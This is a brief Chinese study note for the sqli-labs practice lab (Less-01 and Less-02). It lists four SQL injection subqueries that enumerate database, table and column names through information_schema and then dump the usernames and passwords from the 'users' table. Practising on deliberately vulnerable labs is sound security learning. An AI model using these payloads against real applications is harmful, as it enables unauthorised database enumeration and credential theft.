sqli-labs/less-01和less-02重要笔记

1.(select group_concat(schema_name) from information_schema.schemata)    　　　　--查看所有数据库名

2.(select group_concat(table_name) from information_schema.tables where table_schema='security')    　　--查看security内的所有表名

3.(select group_concat(column_name) from information_schema.columns where table_name='users')      　 --查看users内的所有列名

4.(select group_concat(username) from security.users) ，(select group_concat(password) from security.users)　　--爆出数据库的用户名和密码